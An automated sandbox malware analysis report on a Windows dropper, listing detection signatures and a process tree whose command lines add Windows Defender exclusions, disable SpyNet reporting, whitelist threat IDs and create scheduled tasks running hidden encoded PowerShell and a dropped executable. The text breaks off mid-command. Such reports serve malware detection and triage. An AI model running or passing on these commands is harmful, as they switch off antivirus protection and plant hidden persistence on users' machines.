Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5716 cmdline: C:\Users\user\Desktop\file.exe MD5: 2D9B13584AB871C81FF24C473468CFFA)
- Install.exe (PID: 5652 cmdline: .\Install.exe MD5: 3ADC95B09B9644E908114624326E8D0B)
- Install.exe (PID: 5704 cmdline: .\Install.exe /S /site_id "525403" MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
- forfiles.exe (PID: 5644 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 4504 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 6036 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- reg.exe (PID: 5976 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- forfiles.exe (PID: 5616 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 4672 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 5988 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- reg.exe (PID: 4708 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- schtasks.exe (PID: 6016 cmdline: schtasks /CREATE /TN "gqlLYiBSq" /SC once /ST 05:56:18 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 1416 cmdline: schtasks /run /I /tn "gqlLYiBSq" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 2044 cmdline: schtasks /DELETE /F /TN "gqlLYiBSq" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 4580 cmdline: schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:28:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe\" d8 /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 2868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5672 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpupdate.exe (PID: 1268 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
- conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpscript.exe (PID: 1408 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
- iZqzyKf.exe (PID: 5100 cmdline: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe d8 /site_id 525403 /S MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
- powershell.exe (PID: 1084 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Pol